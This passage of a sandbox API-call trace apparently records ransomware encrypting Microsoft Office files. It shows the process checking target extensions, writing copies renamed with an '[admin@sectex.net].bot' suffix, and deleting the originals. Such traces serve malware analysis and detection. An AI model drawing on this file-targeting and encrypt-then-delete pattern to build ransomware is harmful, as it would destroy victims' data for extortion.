	[0144.530] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.540] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbengr.vsl")) returned 1
	[0144.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58
	[0144.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58
	[0144.541] lstrlenW (lpString=".doc") returned 4
	[0144.541] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0144.541] lstrlenW (lpString=".docx") returned 5
	[0144.541] lstrcmpiW (lpString1=".docx", lpString2="R.VSL") returned -1
	[0144.541] lstrlenW (lpString=".pdf") returned 4
	[0144.541] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0144.541] lstrlenW (lpString=".xls") returned 4
	[0144.541] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0144.541] lstrlenW (lpString=".xlsx") returned 5
	[0144.541] lstrcmpiW (lpString1=".xlsx", lpString2="R.VSL") returned -1
	[0144.541] lstrlenW (lpString=".ppt") returned 4
	[0144.541] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0144.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58
	[0144.541] lstrlenW (lpString=".zip") returned 4
	[0144.541] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0144.541] lstrlenW (lpString=".rar") returned 4
	[0144.541] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0144.541] lstrlenW (lpString=".bz2") returned 4
	[0144.541] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0144.541] lstrlenW (lpString=".7z") returned 3
	[0144.541] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0144.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58
	[0144.541] lstrlenW (lpString=".dbf") returned 4
	[0144.541] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0144.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58
	[0144.541] lstrlenW (lpString=".1cd") returned 4
	[0144.542] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0144.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58
	[0144.542] lstrlenW (lpString=".jpg") returned 4
	[0144.542] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0144.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58
	[0144.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58
	[0144.542] lstrlenW (lpString=".doc") returned 4
	[0144.542] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0144.542] lstrlenW (lpString=".docx") returned 5
	[0144.542] lstrcmpiW (lpString1=".docx", lpString2="R.VSL") returned -1
	[0144.542] lstrlenW (lpString=".pdf") returned 4
	[0144.542] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0144.542] lstrlenW (lpString=".xls") returned 4
	[0144.542] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0144.542] lstrlenW (lpString=".xlsx") returned 5
	[0144.542] lstrcmpiW (lpString1=".xlsx", lpString2="R.VSL") returned -1
	[0144.542] lstrlenW (lpString=".ppt") returned 4
	[0144.542] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0144.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58
	[0144.542] lstrlenW (lpString=".zip") returned 4
	[0144.542] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0144.542] lstrlenW (lpString=".rar") returned 4
	[0144.542] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0144.542] lstrlenW (lpString=".bz2") returned 4
	[0144.542] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0144.542] lstrlenW (lpString=".7z") returned 3
	[0144.542] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0144.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58
	[0144.542] lstrlenW (lpString=".dbf") returned 4
	[0144.542] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0144.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58
	[0144.542] lstrlenW (lpString=".1cd") returned 4
	[0144.543] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0144.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58
	[0144.543] lstrlenW (lpString=".jpg") returned 4
	[0144.543] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0144.543] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0144.543] lstrlenW (lpString="EXCEL_F_COL.HXK") returned 15
	[0144.543] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0144.543] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=114) returned 1
	[0144.543] CloseHandle (hObject=0x31c) returned 1
	[0144.543] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_f_col.hxk")) returned 0x20
	[0144.543] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_f_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0144.544] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.544] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_f_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0144.544] GetLastError () returned 0x0
	[0144.544] ReadFile (in: hFile=0x31c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x72, lpOverlapped=0x0) returned 1
	[0144.545] WriteFile (in: hFile=0x25c, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0144.546] ReadFile (in: hFile=0x31c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.546] WriteFile (in: hFile=0x25c, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xf2, lpOverlapped=0x0) returned 1
	[0144.546] SetEndOfFile (hFile=0x25c) returned 1
	[0144.547] CloseHandle (hObject=0x25c) returned 1
	[0144.547] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.547] SetEndOfFile (hFile=0x31c) returned 1
	[0144.549] CloseHandle (hObject=0x31c) returned 1
	[0144.549] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.549] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_f_col.hxk")) returned 1
	[0144.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK") returned 63
	[0144.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK") returned 63
	[0144.550] lstrlenW (lpString=".doc") returned 4
	[0144.550] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0144.550] lstrlenW (lpString=".docx") returned 5
	[0144.550] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0144.550] lstrlenW (lpString=".pdf") returned 4
	[0144.550] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0144.550] lstrlenW (lpString=".xls") returned 4
	[0144.550] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0144.550] lstrlenW (lpString=".xlsx") returned 5
	[0144.550] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0144.550] lstrlenW (lpString=".ppt") returned 4
	[0144.550] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0144.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK") returned 63
	[0144.550] lstrlenW (lpString=".zip") returned 4
	[0144.550] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0144.550] lstrlenW (lpString=".rar") returned 4
	[0144.550] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0144.550] lstrlenW (lpString=".bz2") returned 4
	[0144.550] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0144.550] lstrlenW (lpString=".7z") returned 3
	[0144.550] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0144.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK") returned 63
	[0144.551] lstrlenW (lpString=".dbf") returned 4
	[0144.551] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0144.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK") returned 63
	[0144.551] lstrlenW (lpString=".1cd") returned 4
	[0144.551] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0144.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK") returned 63
	[0144.551] lstrlenW (lpString=".jpg") returned 4
	[0144.551] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0144.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK") returned 63
	[0144.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK") returned 63
	[0144.551] lstrlenW (lpString=".doc") returned 4
	[0144.551] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0144.551] lstrlenW (lpString=".docx") returned 5
	[0144.551] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0144.551] lstrlenW (lpString=".pdf") returned 4
	[0144.551] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0144.551] lstrlenW (lpString=".xls") returned 4
	[0144.551] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0144.551] lstrlenW (lpString=".xlsx") returned 5
	[0144.551] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0144.551] lstrlenW (lpString=".ppt") returned 4
	[0144.551] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0144.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK") returned 63
	[0144.551] lstrlenW (lpString=".zip") returned 4
	[0144.551] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0144.551] lstrlenW (lpString=".rar") returned 4
	[0144.551] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0144.551] lstrlenW (lpString=".bz2") returned 4
	[0144.551] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0144.551] lstrlenW (lpString=".7z") returned 3
	[0144.551] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0144.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK") returned 63
	[0144.552] lstrlenW (lpString=".dbf") returned 4
	[0144.552] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0144.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK") returned 63
	[0144.552] lstrlenW (lpString=".1cd") returned 4
	[0144.552] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0144.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK") returned 63
	[0144.552] lstrlenW (lpString=".jpg") returned 4
	[0144.552] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0144.552] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0144.552] lstrlenW (lpString="EXCEL_K_COL.HXK") returned 15
	[0144.552] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0144.552] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=113) returned 1
	[0144.552] CloseHandle (hObject=0x31c) returned 1
	[0144.552] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_k_col.hxk")) returned 0x20
	[0144.553] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_k_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0144.553] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.553] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_k_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0144.554] GetLastError () returned 0x0
	[0144.554] ReadFile (in: hFile=0x31c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x71, lpOverlapped=0x0) returned 1
	[0144.555] WriteFile (in: hFile=0x25c, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0144.555] ReadFile (in: hFile=0x31c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.555] WriteFile (in: hFile=0x25c, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xf2, lpOverlapped=0x0) returned 1
	[0144.556] SetEndOfFile (hFile=0x25c) returned 1
	[0144.556] CloseHandle (hObject=0x25c) returned 1
	[0144.556] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.556] SetEndOfFile (hFile=0x31c) returned 1
	[0144.559] CloseHandle (hObject=0x31c) returned 1
	[0144.559] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.561] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_k_col.hxk")) returned 1
	[0144.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK") returned 63
	[0144.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK") returned 63
	[0144.562] lstrlenW (lpString=".doc") returned 4
	[0144.562] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0144.562] lstrlenW (lpString=".docx") returned 5
	[0144.562] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0144.562] lstrlenW (lpString=".pdf") returned 4
	[0144.562] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0144.562] lstrlenW (lpString=".xls") returned 4
	[0144.562] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0144.562] lstrlenW (lpString=".xlsx") returned 5
	[0144.562] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0144.562] lstrlenW (lpString=".ppt") returned 4
	[0144.562] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0144.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK") returned 63
	[0144.562] lstrlenW (lpString=".zip") returned 4
	[0144.562] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0144.562] lstrlenW (lpString=".rar") returned 4
	[0144.562] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0144.562] lstrlenW (lpString=".bz2") returned 4
	[0144.562] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0144.562] lstrlenW (lpString=".7z") returned 3
	[0144.562] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0144.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK") returned 63
	[0144.562] lstrlenW (lpString=".dbf") returned 4
	[0144.562] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0144.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK") returned 63
	[0144.562] lstrlenW (lpString=".1cd") returned 4
	[0144.562] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0144.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK") returned 63
	[0144.562] lstrlenW (lpString=".jpg") returned 4
	[0144.562] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0144.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK") returned 63
	[0144.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK") returned 63
	[0144.563] lstrlenW (lpString=".doc") returned 4
	[0144.563] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0144.563] lstrlenW (lpString=".docx") returned 5
	[0144.563] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0144.563] lstrlenW (lpString=".pdf") returned 4
	[0144.563] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0144.563] lstrlenW (lpString=".xls") returned 4
	[0144.563] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0144.563] lstrlenW (lpString=".xlsx") returned 5
	[0144.563] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0144.563] lstrlenW (lpString=".ppt") returned 4
	[0144.563] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0144.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK") returned 63
	[0144.563] lstrlenW (lpString=".zip") returned 4
	[0144.563] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0144.563] lstrlenW (lpString=".rar") returned 4
	[0144.563] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0144.563] lstrlenW (lpString=".bz2") returned 4
	[0144.563] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0144.563] lstrlenW (lpString=".7z") returned 3
	[0144.563] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0144.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK") returned 63
	[0144.563] lstrlenW (lpString=".dbf") returned 4
	[0144.563] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0144.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK") returned 63
	[0144.563] lstrlenW (lpString=".1cd") returned 4
	[0144.563] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0144.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK") returned 63
	[0144.563] lstrlenW (lpString=".jpg") returned 4
	[0144.563] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0144.564] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0144.564] lstrlenW (lpString="EXPTOOWS.DLL") returned 12
	[0144.564] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\exptoows.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0144.698] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=12160) returned 1
	[0144.698] CloseHandle (hObject=0x384) returned 1
	[0144.698] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\exptoows.dll")) returned 0x20
	[0144.911] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\exptoows.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.911] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\exptoows.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0144.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL") returned 60
	[0144.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL") returned 60
	[0144.911] lstrlenW (lpString=".doc") returned 4
	[0144.911] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0144.911] lstrlenW (lpString=".docx") returned 5
	[0144.911] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0144.912] lstrlenW (lpString=".pdf") returned 4
	[0144.912] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0144.912] lstrlenW (lpString=".xls") returned 4
	[0144.912] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0144.912] lstrlenW (lpString=".xlsx") returned 5
	[0144.912] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0144.912] lstrlenW (lpString=".ppt") returned 4
	[0144.912] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0144.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL") returned 60
	[0144.912] lstrlenW (lpString=".zip") returned 4
	[0144.912] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0144.912] lstrlenW (lpString=".rar") returned 4
	[0144.912] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0144.912] lstrlenW (lpString=".bz2") returned 4
	[0144.912] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0144.912] lstrlenW (lpString=".7z") returned 3
	[0144.912] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0144.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL") returned 60
	[0144.912] lstrlenW (lpString=".dbf") returned 4
	[0144.912] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0144.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL") returned 60
	[0144.912] lstrlenW (lpString=".1cd") returned 4
	[0144.912] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0144.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL") returned 60
	[0144.912] lstrlenW (lpString=".jpg") returned 4
	[0144.912] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0144.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL") returned 60
	[0144.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL") returned 60
	[0144.912] lstrlenW (lpString=".doc") returned 4
	[0144.912] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0144.912] lstrlenW (lpString=".docx") returned 5
	[0144.912] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0144.912] lstrlenW (lpString=".pdf") returned 4
	[0144.912] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0144.913] lstrlenW (lpString=".xls") returned 4
